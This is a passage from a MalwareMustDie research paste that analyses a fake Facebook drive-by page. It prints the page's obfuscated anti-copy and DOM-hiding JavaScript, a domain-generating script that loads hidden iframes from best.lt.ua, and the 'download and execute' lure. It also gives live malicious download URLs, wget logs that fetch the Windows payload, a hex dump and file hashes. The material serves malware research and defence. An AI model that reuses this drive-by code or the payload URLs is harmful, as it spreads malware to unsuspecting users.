463.    document.captureEvents(Event.MOUSEDOWN);
464.    document.onmousedown = cNS
465.  }
466.  else
467.  {
468.    document.onmouseup = cNS
469.  };
470.  document.oncontextmenu = new Function("return false");
471.  if (oe)
472.  {
473.    function ro(e)
474.    {
475.      if (event.button == 2)
476.      {
477.        alert(' ');
478.        return 0
479.      };
480.      return true
481.    };
482.    document.onmousedown = ro
483.  };
484.  function ns9()
485.  {
486.    window.status = ' ';
487.    setTimeout('ns9()', 1000);
488.    return true
489.  };
490.  if (!oe)
491.  {
492.    ns9();
493.    document.onmouseover = ns9;
494.    document.onmouseout = ns9
495.  };
496.  function u0(a)
497.  {
498.    return false
499.  };
500.  function u1(e)
501.  {
502.    return (e.target.tagName != null && e.target.tagName.search(
503.    '^(INPUT|TEXTAREA|BUTTON|SELECT|HTML)$') !=- 1)
504.  };
505.  function u2(e)
506.  {
507.    if (e.which == 1)
508.    {
509.      window.captureEvents(Event.MOUSEMOVE);
510.      window.onmousemove = u0
511.    }
512.  };
513.  function u3(e)
514.  {
515.    if (e.which == 1)
516.    {
517.      window.releaseEvents(Event.MOUSEMOVE);
518.      window.onmousemove = null
519.    }
520.  };
521.  if (dl)
522.  {
523.    window.captureEvents(Event.MOUSEUP | Event.MOUSEDOWN);
524.    window.onmousedown = u2;
525.    window.onmouseup = u3
526.  }
527.  else if (ge &&! da)
528.  {
529.    document.onmousedown = u1
530.  };
531.  function nn()
532.  {
533.    if (window.getSelection)
534.    {
535.      var t = window.getSelection().toString();
536.      if (t.indexOf('qweasdzxc') > 1 || t.length > 40)
537.      {
538.        document.body.innerHTML = '.';
539.        location.reload()
540.      };
541.      setTimeout("nn()", 200)
542.    }
543.  };
544.  nn();
545.  function ni()
546.  {
547.    if (da)
548.    {
549.      document.onselectstart = function ()
550.      {
551.        return false
552.      };
553.      setTimeout("ni()", 200)
554.    }
555.  };
556.  ni();
557.  if (da &&! oe &&! i7f)
558.  {
559.    fc = '<' +
560.    'div style="position:absolute;left:-1000px;top:-1000px;width:60px;height:35px;z-index:1">'  + '<+
561.    'input type="button" name="xqq" value="" onClick=ccd() style="visibility:hidden"><' + '/div>';
562.    document.write(fc);
563.    function ccd()
564.    {
565.      clipboardData.clearData()
566.    };
567.    function cce()
568.    {
569.      xqq.click();
570.      setTimeout("cce()", 300)
571.    };
572.    setTimeout("cce()", 3000)
573.  };
574.  if (zis8)
575.  {
576.    window.attachEvent('onload', qy9)
577.  };
578.  </script><script id='lllI'>var ppconf = 0;
579.  var qy7 = '';
580.  qy8 = String.fromCharCode(13, 10, 13, 10);
581.  for (i = 0; i < 470; i ++ )
582.  {
583.    qy7 += qy8
584.  };
585.  lI1I = "<" + "!--" + qy7 + "--" + ">";
586.  III1 = "/" + "*" + qy7 + "*" + "/";
587.  Illl = "<scr" + "ipt>" + lIII(1) + lIII(2) + "='" + lIII(3) + "'</scri" + "pt>";
588.  l1II = "<s" + "pan style='display:none'><pre>" + qy7 + "</pre></s" + "pan>";
589.  l1Il = l1II + lI1I + l1II;
590.  Il11 = "<" + "span>";
591.  I1l1 = "</" + "span>";
592.  Ill1 = "<" + "span style='visibility:hidden'>qweasdzxc" + I1l1;
593.  function l11I()
594.  {
595.    I111 = new Array('beforeBegin', 'afterBegin', 'beforeEnd', 'afterEnd');
596.    Il1I = new Array('html', 'head', 'body', 'a', 'img', 'div', 'form', 'table', 'script',
597.    'input', 'p');
598.    lII1 = l1I1();
599.    switch(lII1)
600.    {
601.      case1 : IIII = new Array(79, 79, 79, 73, 73, 73, 73, 73, 73, 73, 73);
602.      break ;
603.      case2 : IIII = new Array(38, 47, 47, 15, 41, 15, 9, 9, 22, 15, 15);
604.      break ;
605.      case3 : IIII = new Array(0, 38, 38, 15, 9, 15, 9, 9, 22, 15, 15);
606.      break ;
607.      case4 : IIII = new Array(38, 47, 47, 15, 41, 15, 9, 9, 22, 15, 15);
608.      break ;
609.      default : IIII = new Array(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
610.    };
611.    lIIl = new Array(lI1I, III1, Illl, l1II, l1Il, Il11, I1l1, Ill1);
612.    I11l(document.getElementsByTagName(Il1I[2])[0], 2, lIIl[7]);
613.    for (t = 0; t < Il1I.length; t ++ )
614.    {
615.      m = IIII[t];
616.      I1lI = document.getElementsByTagName(Il1I[t]);
617.      ctaL = I1lI.length;
618.      for (j = 0; j < ctaL; j ++ )
619.      {
620.        for (x = 0; x < 4; x ++ )
621.        {
622.          if (m & Math.pow(2, x))
623.          {
624.            I11l(I1lI[j], x, lIIl[m >>> 4])
625.          }
626.        }
627.      }
628.    };
629.    IllI();
630.    I1ll();
631.    llll();
632.    lI1l();
633.    setTimeout('l11l()', 1000)
634.  };
635.  function IllI()
636.  {
637.    var I11I = document.images, IIIl = document.links, il = I11I.length, ll = IIIl.length,
638.    lll1;
639.    while (il)
640.    {
641.      Il1l = document.createElement('span');
642.      lll1 = I11I[ -- il];
643.      if (!(ppconf & 2))
644.      {
645.        try
646.        {
647.          Il1l.appendChild(lll1.parentNode.replaceChild(Il1l, lll1))
648.        }
649.        catch (e)
650.        {
651.        }
652.      }
653.    };
654.    while (ll)
655.    {
656.      Il1l = document.createElement('span');
657.      lll1 = IIIl[ -- ll];
658.      if (!(ppconf & 1))
659.      {
660.        try
661.        {
662.          Il1l.appendChild(lll1.parentNode.replaceChild(Il1l, lll1))
663.        }
664.        catch (e)
665.        {
666.        }
667.      }
668.    }
669.  };
670.  function I1ll()
671.  {
672.    window.open = null;
673.    document.open = null;
674.    window.alert = null;
675.  };
676.  function llll()
677.  {
678.    var extraFunc1Cntnt = 0
679.  };
680.  function lI1l()
681.  {
682.    var extraFunc2Cntnt = 0
683.  };
684.  function I11l(e, p, c)
685.  {
686.    try
687.    {
688.      if (!window.sidebar)
689.      {
690.        e.insertAdjacentHTML(I111[p], c)
691.      }
692.      else
693.      {
694.        rcf = document.createRange().createContextualFragment(c);
695.        if (p == 0)
696.        {
697.          e.parentNode.insertBefore(rcf, e)
698.        };
699.        if (p == 1)
700.        {
701.          e.insertBefore(rcf, e.firstChild)
702.        };
703.        if (p == 2)
704.        {
705.          e.appendChild(rcf)
706.        };
707.        if (p == 3)
708.        {
709.          e.parentNode.insertBefore(rcf, e.nextSibling)
710.        }
711.      }
712.    }
713.    catch (xuu)
714.    {
715.    }
716.  };
717.  function lIII(j)
718.  {
719.    r = Math.random();
720.    d = new Date().getTime();
721.    if (j == 1)
722.    {
723.      o = String.fromCharCode(Math.floor(r * 25 + 65))
724.    }
725.    else
726.    {
727.      o = Math.floor(r * d * 1000) + '';
728.      o += o;
729.      o += o;
730.      o += o
731.    };
732.    if (j == 3)
733.    {
734.      o += o;
735.      o += o
736.    };
737.    return o
738.  };
739.  if (typeof window.addEventListener != 'undefined')
740.  {
741.    window.addEventListener('load', l11I, false)
742.  }
743.  else if (typeof document.addEventListener != 'undefined')
744.  {
745.    document.addEventListener('load', l11I, false)
746.  }
747.  else if (typeof window.attachEvent != 'undefined')
748.  {
749.    window.attachEvent('onload', l11I)
750.  };
751.  function l1I1()
752.  {
753.    lII1 = 0;
754.    u = navigator.userAgent.toLowerCase();
755.    if (window.sidebar)
756.    {
757.      lII1 = 2
758.    };
759.    if (window.chrome)
760.    {
761.      lII1 = 3
762.    };
763.    if (window.opera)
764.    {
765.      lII1 = 4
766.    };
767.    if (document.all && lII1 !== 4)
768.    {
769.      lII1 = 1
770.    };
771.    if (u.indexOf('safari') > 1)
772.    {
773.      lII1 = 3
774.    };
775.    if ((lII1 == 1) && (u.indexOf('ie 10') > 1))
776.    {
777.      lII1 = 10
778.    };
779.    return lII1
780.  }
781.  </script> <script>function l11l()
782.  {
783.    try
784.    {
785.      l111 = document.getElementById('lllI');
786.      l111.parentNode.removeChild(l111)
787.    }
788.    catch (errr)
789.    {
790.    }
791.  }
792.  </script>
793.  
794.  
795. //===================================
796. //THE THREAT STARTS HERE!!!
797. //The DGA Downloader Engine..
798. //#MalwareMustDie!
799. //====================================
800.  
801. <TITLE>
802.  Facebook</TITLE><META NAME="Generator" CONTENT="Facebook.com"><META NAME="Author" CONTENT=
803.  "Facebook.com"><META NAME="Keywords" CONTENT="Wow, lol, awesome, cool"><META NAME="Description"
804.  CONTENT="Wow! Have you ever seen?"><link rel="shortcut icon" href=
805.  "http://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" /></HEAD><BODY> <script type=
806.  'text/javascript'>function randomString(length)
807.  {
808.    var chars = 'abcdefghiklmnopqrstuvwxyz'.split('');
809.    if (!length)
810.    {
811.      length = Math.floor(Math.random() * chars.length)
812.    };
813.    var str = '';
814.    for (var i = 0; i < length; i ++ )
815.    {
816.      str += chars[Math.floor(Math.random() * chars.length)]
817.    };
818.    return str
819.  };
820.  function genDomain()
821.  {
822.    var sdom = 'http://' + randomString(6) + '.best.lt.ua/dlimage4.php?' + randomString(2) +
823.    '=' + randomString(4);
824.    document.write('<iframe src="' + sdom +
825.    '" width="0" height="0" frameborder="0"></iframe>');
826.  };
827.  genDomain()</script> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding=
828.  "0" align="center"><tbody><tr bgcolor="#3B5998" height="80"><td align="left" valign="center"><IMG
829.  SRC="http://fbstatic-a.akamaihd.net/rsrc.php/v2/yX/x/Qq6L1haQrYr.png" BORDER="0" ALT=""></td></tr>
830.  <tr bgcolor="#E7EBF2"><td align="center" valign="center"><font face=
831.  "lucida grande,tahoma,verdana,arial" color="#0E385F" size="+4"><B>
832.  Download and execute the facebook app, please! You will be surprised :)</B></font></td></tr><tr
833.  bgcolor="#E7EBF2"><td align="center" valign="top"><font face="lucida grande,tahoma,verdana,arial"
834.  color="#333333">Your download should be starting in 2 seconds...</font><BR><BR><A HREF=
835.  "javascript:document.location.href=document.location.href;"><font face=
836.  "lucida grande,tahoma,verdana,arial" color="#0E385F"><B>
837.  If your download doesn't start, please click here</B></font></A></td></tr></tbody></table> <script
838.  type='text/javascript'>window.setTimeout("document.location.href='http://wickedreport.com'", 120000)</script> </BODY></HTML>
839.  
840. ===========================
841. MALICIOUS URL FOR DOWNLOAD
842. ===========================
843. http://xizcvo.best.lt.ua/dlimage4.php?ol=bzhe
844. http://kvnkyp.best.lt.ua/dlimage4.php?ol=bzhe
845. http://lgktbu.best.lt.ua/dlimage4.php?zz=lwgb
846. http://eclrwr.best.lt.ua/dlimage4.php?zz=lwgb
847. http://xtkmcv.best.lt.ua/dlimage4.php?ol=bzhe
848. http://knqmlf.best.lt.ua/dlimage4.php?ol=qmark
849. and blah blah etc similar URL..
850. ===========================
851. MITIGATION
852. ===========================
853.  
854. Research Search Strings (Noted: NOT regex) and Mitigation= "best.lt.ua/dlimage4.php"
855.  
856.  
857. ===========================
858. PAYLOAD:
859. ===========================
860.  
861. ]$ wget http://paphgi.best.lt.ua/dlimage4.php
862. --2013-11-08 06:08:22--  http://paphgi.best.lt.ua/dlimage4.php
863. Resolving paphgi.best.lt.ua (paphgi.best.lt.ua)... 103.246.115.238
864. Connecting to paphgi.best.lt.ua (paphgi.best.lt.ua)|103.246.115.238|:80... connected.
865. HTTP request sent, awaiting response... 200 OK
866. Length: 160768 (157K) [application/force-download]
867. Saving to: 'dlimage4.php'
868. 100%[==============>] 160,768      405KB/s   in 0.4s
869. 2013-11-08 06:08:24 (405 KB/s) - 'dlimage4.php' saved [160768/160768]
870.  
871. $ wget http://ahrcdv.best.lt.ua/dlimage4.php -O sample
872. --2013-11-08 06:20:15--  http://ahrcdv.best.lt.ua/dlimage4.php
873. Resolving ahrcdv.best.lt.ua (ahrcdv.best.lt.ua)... 103.246.115.238
874. Connecting to ahrcdv.best.lt.ua (ahrcdv.best.lt.ua)|103.246.115.238|:80... connected.
875. HTTP request sent, awaiting response... 200 OK
876. Length: 160768 (157K) [application/force-download]
877. Saving to: 'sample2.exe'
878. 100%[==============>] 160,768      349KB/s   in 0.5s
879. 2013-11-08 06:20:16 (349 KB/s) - 'sample2.exe' saved [160768/160768]
880.  
881. // bintezxt
882.  
883. 0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
884. 0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
885. 0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
886. 0030   00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00    ................
887. 0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
888. 0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
889. 0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
890. 0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
891. 0080   A0 5C EA C1 E4 3D 84 92 E4 3D 84 92 E4 3D 84 92    .....=...=...=..
892. 0090   6A 22 97 92 F3 3D 84 92 C3 FB FF 92 E3 3D 84 92    j"...=.......=..
893. 00A0   E4 3D 85 92 AD 3D 84 92 FA 6F 07 92 E5 3D 84 92    .=...=...o...=..
894. 00B0   E4 3D 84 92 E6 3D 84 92 FA 6F 10 92 E5 3D 84 92    .=...=...o...=..
895. 00C0   FA 6F 15 92 E5 3D 84 92 52 69 63 68 E4 3D 84 92    .o...=..Rich.=..
896. 00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
897. 00E0   50 45 00 00 4C 01 1C 00 CD A6 7B 52 00 00 00 00    PE..L.....{R....
898.  
899. https://www.virustotal.com/en/file/c86c44ad564ad33d9c92e41530933747dc954875cbad403b809d2a86567b34ef/analysis/
900. SHA256: c86c44ad564ad33d9c92e41530933747dc954875cbad403b809d2a86567b34ef
901. SHA1:   a98f5ae3e3f1dc174812706b7318708acae7af77
902. MD5:    d3fa25f8f7568735d36d565aa2b99c1a
903. File size:  157.0 KB ( 160768 bytes )
904. File name:  a98f5ae3e3f1dc174812706b7318708acae7af77
905. File type:  Win32 EXE
906. Tags:   peexe
907. Detection ratio:    5 / 47
908. Analysis date:  2013-11-07 14:55:28 UTC ( 6 hours, 18 minutes ago )
909.  
910. MORE PAyloads:
911.  
912. http://urlquery.net/search.php?q=best.lt.ua%2Fdlimage4.php&type=string&start=2013-10-23&end=2013-11-07&max=50
913.  
914. ----
915. MalwareMustDie,NPO Research Group
916. Web http://malwaremustdie.org
917. Research blog: http://malwaremustdie.blogspot.com
918. Wiki & Code: http://code.google.com/p/malwaremustdie/
919. Report Pastes: http://pastebin.com/u/MalwareMustDie